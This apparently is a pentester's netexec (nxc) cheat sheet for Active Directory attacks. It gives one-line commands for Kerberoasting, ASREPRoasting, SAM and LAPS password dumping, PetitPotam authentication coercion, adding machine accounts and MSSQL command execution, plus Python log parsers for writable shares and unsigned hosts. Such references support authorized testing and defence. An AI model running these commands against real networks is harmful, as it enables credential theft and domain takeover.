netexec (nxc)
nxc "is a network service exploitation tool that helps automate assessing the security of large networks." Check out the BHIS cheat sheet on this topic.
Generate a hosts file
nxc smb 10.3.10.0/24 --generate-hosts-file hosts.txt
Append the generated hosts file to your actual /etc/hosts file. Note that sudo only elevates cat, not the shell's >> redirection (which runs as your unprivileged user and fails with "Permission denied"), so pipe through tee instead:
cat hosts.txt | sudo tee -a /etc/hosts
Check for vulnerable certificate templates (AD CS)
nxc ldap domain.com -u user -p pass -M certipy-find
Check Machine Account Quota (MAQ) value
nxc ldap domain.com -u user -p pass -M maq
Basic SMB auth
nxc smb somehost -u user -p 'Winter2027!'
Basic SMB auth (Kerberos)
I like to use getTGT to request a ticket, then export KRB5CCNAME=user.ccache so nxc picks it up from the credential cache; here are some enumeration examples:
Connect to host with SMB:
nxc smb server.domain.com --use-kcache
Turn on logging
To log every nxc command and output to a file, find the nxc.conf file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:
log_mode = True
Change the Pwn3d label
You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf file and change:
pwn3d_label = Compromised!
ASREPRoasting
nxc ldap dc1.domain.com -u you -p 'Arnold123!' --asreproast asrep.txt
Kerberoasting
nxc ldap domain.com -u lowpriv -p JingleAllTheWay! --kerberoasting kerbs.txt
If you have a ton of Kerberoastable users, you can see them a little easier if you grep the output to include just the usernames:
grep -oP '\$krb5tgs\$\d+\$\*\K[^$]+' kerbs.txt | tr '[:lower:]' '[:upper:]' | sort -fu
Find shares
Filtering shares
If you want to find just READ/WRITE shares for example:
Or just WRITE:
Cleaning up share list from log file
If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.
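As an added example (not code from this page or from the nxc project), here is a small parser for the share table that nxc writes into its log when log_mode is on. It assumes nxc's usual column layout (protocol, IP, port, host, share, permissions, remark) and that share names contain no spaces; the log lines below are constructed sample data, not output from a real host. It returns deduplicated UNC paths for whichever permission you ask about, which is handy both for the WRITE grep described above and for handing a remediation list of over-permissive shares to the share owners.

```python
import re

# Constructed sample of the share table nxc logs for two hosts (not real output).
# Note that ADMIN$ and C$ have an empty permissions column: the account has no access.
SAMPLE_LOG = """\
SMB         10.3.10.5       445    FS01             [*] Enumerated shares
SMB         10.3.10.5       445    FS01             Share           Permissions     Remark
SMB         10.3.10.5       445    FS01             -----           -----------     ------
SMB         10.3.10.5       445    FS01             ADMIN$                          Remote Admin
SMB         10.3.10.5       445    FS01             C$                              Default share
SMB         10.3.10.5       445    FS01             IPC$            READ            Remote IPC
SMB         10.3.10.5       445    FS01             Public          READ,WRITE
SMB         10.3.10.5       445    FS01             Finance         READ
SMB         10.3.10.2       445    DC01             [*] Enumerated shares
SMB         10.3.10.2       445    DC01             Share           Permissions     Remark
SMB         10.3.10.2       445    DC01             -----           -----------     ------
SMB         10.3.10.2       445    DC01             NETLOGON        READ            Logon server share
SMB         10.3.10.2       445    DC01             SYSVOL          READ            Logon server share
SMB         10.3.10.2       445    DC01             Scratch         WRITE
"""

# Assumed layout: a share row has a permissions column that is exactly READ, WRITE
# or READ,WRITE. Header rows, status lines and no-access shares never match.
SHARE_ROW_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+(?P<share>\S+)\s+"
    r"(?P<perms>READ,WRITE|READ|WRITE)(?:\s+(?P<remark>.*?))?\s*$"
)


def parse_share_rows(text):
    """Return one dict per share row on which the account has some access."""
    rows = []
    for line in text.splitlines():
        m = SHARE_ROW_RE.match(line)
        if not m:
            continue  # banners, table headers, dashes, shares with no permissions
        rows.append({
            "host": m.group("host"),
            "ip": m.group("ip"),
            "share": m.group("share"),
            "perms": set(m.group("perms").split(",")),
            "remark": m.group("remark") or "",
        })
    return rows


def shares_with(text, perm):
    """Sorted, deduplicated UNC paths of shares granting `perm` ("READ" or "WRITE")."""
    return sorted(
        {f"\\\\{r['host']}\\{r['share']}" for r in parse_share_rows(text) if perm in r["perms"]}
    )


if __name__ == "__main__":
    for path in shares_with(SAMPLE_LOG, "WRITE"):
        print(path)
```

Run it against your real log with `shares_with(open("nxc.log").read(), "WRITE")`; because the function works on the parsed permission set rather than a substring match, a remark that happens to contain the word WRITE will not produce a false hit.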
Find hosts with/without SMB signing
nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txt
Find hosts with/without SMB signing (alternate way)
Save the scan output to a file, then grep it for anything where signing is set to false:
nxc smb pcs.txt -u '' -p '' > signingcheck.txt
If you want to get kind of fancy-pantsy you can take that grep to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name (the fourth whitespace-separated column in nxc's output):
grep -i "signing:False" signingcheck.txt | sort -k4,4 > no-signing-for-these-folks.txt
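Here is an added example (not code from this page or from nxc) that does the same triage in Python so it can feed a remediation report: it parses nxc's per-host SMB banner lines, lists the hosts with signing:False sorted by hostname, and counts how many of those also still speak SMBv1. It assumes the banner layout nxc prints (protocol, IP, port, host, then "(signing:...)" and "(SMBv1:...)" tags); the lines below are constructed sample data, not a real scan.

```python
import re

# Constructed sample of nxc's per-host SMB banner lines (not real scan output).
# Hosts that could not be fingerprinted get a "[-]" error line with no signing tag.
SAMPLE_OUTPUT = """\
SMB         10.3.10.5       445    FS01             [*] Windows Server 2019 Build 17763 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.3.10.2       445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.3.10.9       445    WS-ACCT7         [*] Windows 10 Build 19041 x64 (name:WS-ACCT7) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.3.10.7       445    APP02            [*] Windows Server 2016 Build 14393 x64 (name:APP02) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.3.10.3       445    PRINT01          [-] Connection Error: timed out
"""

# Assumed banner layout; the SMBv1 tag is optional so older output still parses.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\].*?"
    r"\(signing:(?P<signing>True|False)\)(?:.*?\(SMBv1:(?P<smbv1>True|False)\))?",
    re.IGNORECASE,
)


def parse_banners(text):
    """Return one dict per successfully fingerprinted host."""
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if not m:
            continue  # connection errors and non-banner lines carry no signing info
        hosts.append({
            "ip": m.group("ip"),
            "host": m.group("host"),
            "signing": m.group("signing").lower() == "true",
            "smbv1": (m.group("smbv1") or "").lower() == "true",
        })
    return hosts


def hosts_without_signing(text):
    """Hostnames with signing disabled, sorted case-insensitively by hostname."""
    return sorted(
        (h["host"] for h in parse_banners(text) if not h["signing"]),
        key=str.lower,
    )


def signing_summary(text):
    """Counts for a remediation report: the SMBv1 overlap is the worst of the lot."""
    hosts = parse_banners(text)
    unsigned = [h for h in hosts if not h["signing"]]
    return {
        "fingerprinted": len(hosts),
        "signing_disabled": len(unsigned),
        "signing_disabled_and_smbv1": sum(1 for h in unsigned if h["smbv1"]),
    }


if __name__ == "__main__":
    for host in hosts_without_signing(SAMPLE_OUTPUT):
        print(host)
    print(signing_summary(SAMPLE_OUTPUT))
```

Point it at your real file with `hosts_without_signing(open("signingcheck.txt").read())`. Hosts that timed out are deliberately left out of every count rather than being treated as unsigned, so the report only lists machines whose signing state was actually observed.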
Find hosts running WebClient service
nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdav
Find pre-created computer accounts
nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2k
Dump SAM database
nxc smb VICTIM -u lowpriv -p 'Winter2026!' --sam
Coerce authentication
The nxc wiki has an interesting page on this, covering the various ways nxc can coerce authentication.
NOTE
Instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.
This also applies to the names of the vulnerabilities when specifying a method.
M=p // Invalid, as both petitpotam and printerbug start with 'p', so the module gives an error
M=pr // Matches printerbug
M=pe // Matches petitpotam
M=dfs // Matches dfscoerce
Coerce via PetitPotam:
nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=pe
Add computer to the domain
nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!
MSSQL commands
Lifted from the nxc wiki
Execute database commands
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
Get/put files
Get:
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file.txt /tmp/file
Put:
nxc mssql 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt
Execute commands
nxc mssql 1.2.3.4 -u localdbuser -p 'Winter2026!' --local-auth -x 'dir c:\'
Dump LAPS passwords
Using an account with rights to do so:
nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps
Check LDAP channel binding
nxc ldap dc1.domain.com -u myuser -p 'MeowMeow123!' -M ldap-checker
Dump PowerShell history
nxc smb 192.168.1.5 -u user -p password -M powershell_history -o export=True
See who's logged in
nxc smb 192.168.7.7 -u user -p password --qwinsta
List running tasks
nxc smb 192.168.7.7 -u user -p password --tasklist